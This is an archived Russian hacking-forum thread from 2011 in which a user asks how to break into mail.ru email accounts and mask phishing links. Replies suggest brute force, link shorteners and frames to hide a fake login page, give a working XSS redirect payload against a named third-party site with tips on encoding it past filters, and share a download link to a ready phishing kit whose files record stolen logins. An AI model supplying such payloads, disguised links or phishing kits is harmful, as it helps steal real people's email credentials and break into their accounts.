Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 
журналы новости статьи video форум подписка на «Хакер»

Взлом mail.ru почты.

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Первый вопрос] >> Взлом mail.ru почты.
Имя
Сообщение << Старые топики   Новые топики >>
Взлом mail.ru почты. - 2011-04-29 15:10:25.616666   
Kos94ok

Сообщений: 8
Оценки: 0
Присоединился: 2011-04-29 15:05:21.413333
 Хотел бы расспросить вас о возможных взломах п/я.
С одним способом уже разобрался - фейк. Но слишком палевно все это, не каждый клюнет на левую ссылку.
Хотелось бы узнать о таком способе, при котором с жертвой не нужно устанавливать контакт (т.е. писать ему и просить голоснуть за что либо при этом, что ссылка очень палевная).
И еще один вопрос:
Как можно, так скажем, "замаскировать" ссылку. Т.е. текст ссылки один, а при переходе в URL строке нужная нам ссылка.
То-есть например замаскированная ссылка http://www.radikal.ru/42142142173821.jpg, а настоящая, скажем http://www.sexygirlkaterina.1gb.ru.
Спасибо.
Post #: 1
RE: Взлом mail.ru почты. - 2011-04-29 15:27:35.343333   
GoAttack

Сообщений: 842
Оценки: 189
Присоединился: 2009-05-08 23:20:55.580000
 брут.. с жертвой не нужно устанавливать контакта
http://tinyurl.com/ - сервис маскирующий ссылки.. но многие сервисы, соц. сети уже знают об этом и предупреждают при переходе по ссылке.. также попробуй использовать фреймы
Post #: 2
RE: Взлом mail.ru почты. - 2011-04-29 15:43:25.116666   
Kos94ok

Сообщений: 8
Оценки: 0
Присоединился: 2011-04-29 15:05:21.413333
 Брут совершенно бесполезен.
Что такое фрейм?
Post #: 3
RE: Взлом mail.ru почты. - 2011-04-29 16:25:25.006666   
GoAttack

Сообщений: 842
Оценки: 189
Присоединился: 2009-05-08 23:20:55.580000
 ну например у тебя на site.ru есть страничка html, с помощью фрейма ты можешь сделать, чтобы в ней отображалась другая html страничка, расположенная на site1.ru.. т.е. у тебя фейк будет расположен на site1.ru а в адресной строке будет отображаться site.ru
Post #: 4
RE: Взлом mail.ru почты. - 2011-04-29 18:23:33.273333   
sector28

Сообщений: 29
Оценки: 0
Присоединился: 2009-08-27 20:28:58.750000
 Последнее время мейл ру очень подозрительно относится к редиректам и выводит предательское сообщение о том куда пользователь переходит, выход - использовать xssку на каком-нить другом сайте с незапятноной репутацией например
http://kav.rol.ru/?userkey=aB%22%3e%3c/a%3e%3csсriрt%3edocument.location=%22http://КУДА%22%3c/sсriрt%3e
Маскировку ссылки можно организовать HТМLом
&lt;a href=http://куда&gt;надпись&lt;/a&gt;,

любой скрипт для отправки почты в этом поможет.
Post #: 5
RE: Взлом mail.ru почты. - 2011-04-30 14:10:45.413333   
Kos94ok

Сообщений: 8
Оценки: 0
Присоединился: 2011-04-29 15:05:21.413333
 Можно подробнее о редиректах и xss?
Post #: 6
RE: Взлом mail.ru почты. - 2011-04-30 15:06:37.563333   
Kos94ok

Сообщений: 8
Оценки: 0
Присоединился: 2011-04-29 15:05:21.413333
 И, у меня еще вопрос.
Может кто-нибудь сделать фейк вот этой страницы?
Post #: 7
RE: Взлом mail.ru почты. - 2011-04-30 22:48:18.470000   
sector28

Сообщений: 29
Оценки: 0
Присоединился: 2009-08-27 20:28:58.750000
 http://zalil.ru/30957548
bNdjUSmsX.php - сам список логинопаролей, просмотреть можно только скачав(через http это не получится так что парится по поводу того что могут увести базу не стоит), естессно требует прав на запись.

editor.php - смотрелка той самой базы, требует пароля(UmcUnsGs18S), авторизация по кукам без шифровки.

login.php - записовалка из видимой части ничего, только перенаправление на оригинальный сайт.
index.html думаю и так понятно.


По поводу редиректа:
у мейл ру похоже есть список неблагонадежных ресурсов сообщения со ссылками на которые вообще не пропускаются или летят в спам.
Суть в нахождении на каком-нибудь ресурсе, который там не числится, xss (пассивной или активной, без разницы) перенаправлении юзера через ява скрипт на нужный ресурс&lt;script&gt;document.location='куда'&lt;/script&gt;(могут быть и другие варианты) и подпихивании ссылки в сообщение. В случае с пассивной нужно будет зашифровать кавычки скобки и точки 16 ричным кодом, чтобы их не покарябал фильтр.
Post #: 8
RE: Взлом mail.ru почты. - 2011-05-01 06:46:31.883333   
Kos94ok

Сообщений: 8
Оценки: 0
Присоединился: 2011-04-29 15:05:21.413333
 Спасибо за фейк.)
А насчет того, что ты сказал про редиректы, я ничего не понял. В деле скриптов я пока не очень.
Post #: 9
RE: Взлом mail.ru почты. - 2011-05-01 10:50:08.480000   
Kos94ok

Сообщений: 8
Оценки: 0
Присоединился: 2011-04-29 15:05:21.413333
 http://pics.kz/s5/39/e9/eb/39e9eb001bc42c0c3d0f57c853a7b45f.jpg
Можно ли как-нибудь подделать то значение?
Post #: 10
RE: Взлом mail.ru почты. - 2011-05-01 10:57:03.513333   
ManzikaX

Сообщений: 5
Оценки: 0
Присоединился: 2011-04-25 18:52:02.030000
 Для Kos94ok:
Баланс чего-либо в онлайн игре? Конечно можно, главное получить доступ управления игровым ресурсом
Post #: 11
RE: Взлом mail.ru почты. - 2011-05-01 11:06:38.586666   
Kos94ok

Сообщений: 8
Оценки: 0
Присоединился: 2011-04-29 15:05:21.413333
 Получить доступ?
То есть другими словами - админ панель?
Это нереально. Для меня.
Post #: 12
RE: Взлом mail.ru почты. - 2011-05-02 13:09:48.016666   
Kos94ok

Сообщений: 8
Оценки: 0
Присоединился: 2011-04-29 15:05:21.413333
 http://pics.kz/s4/b2/db/4f/b2db4f41e613f25bfb768204bf31eab9.jpg
Сделайте фейк этой странички пожалуйста.
Post #: 13
Страниц:  [1]
Все форумы >> [Первый вопрос] >> Взлом mail.ru почты.







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.